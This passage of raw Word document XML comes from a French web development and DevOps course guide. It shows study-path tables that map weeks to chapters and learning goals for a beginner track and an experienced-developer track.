              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Partie VII</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mise en pratique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1502"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1</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AUTONOMIE DES COURS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Les deux cours peuvent être lus séparément. Le cours 1 ne suppose aucune connaissance du cours 2 ; le cours 2 signale les rares passages qui font appel à des notions front-end.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>Parcours de progression</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Trois parcours sont proposés selon le point de départ et le temps disponible. Chaque parcours indique les chapitres à travailler et un rythme réaliste, à raison de six à huit heures par semaine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Parcours A — Débuter en développement web (16 semaines)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ce parcours suit le cours 1 dans l'ordre, puis aborde les fondations du cours 2 utiles à la mise en ligne d'un site.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144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Semaines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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Chapitres</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Objectif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1–2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1 à 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4687"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Comprendre le Web, écrire du HTML structuré</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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3–4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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9 à 16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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CSS, typographie, couleurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>5–6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>17 à 23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4687"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Flexbox, Grid, responsive, accessibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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7–8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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24 à 31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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DOM, événements, asynchrone, état</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>32 à 36</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4687"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Débogage, performance, sécurité, mise en ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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37 à 40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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CSS avancé, composants, i18n, maintenance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>11–12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>41 à 45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4687"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PWA, SVG et canvas, polices, tests, tableaux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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13–14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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46 à 53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Culture DevOps, Linux, shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>54 à 61</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4687"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réseaux, DNS, HTTP, serveurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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révisions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Synthèse, projet personnel, mise en ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Parcours B — Développeur confirmé (10 semaines)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ce parcours cible les développeurs qui maîtrisent déjà HTML et CSS et veulent consolider JavaScript, la qualité, la performance et la mise en production.</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144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Semaines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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Chapitres</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Objectif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>17 à 23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4687"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mises en page modernes et accessibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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2–3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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24 à 31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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JavaScript, asynchrone, stockage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>32 à 36</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4687"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Débogage, performance, livraison</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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37 à 40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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CSS avancé, composants, i18n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>41 à 45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4687"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PWA, dessin, typographie, tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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46 à 53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Culture DevOps, Linux, Git</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
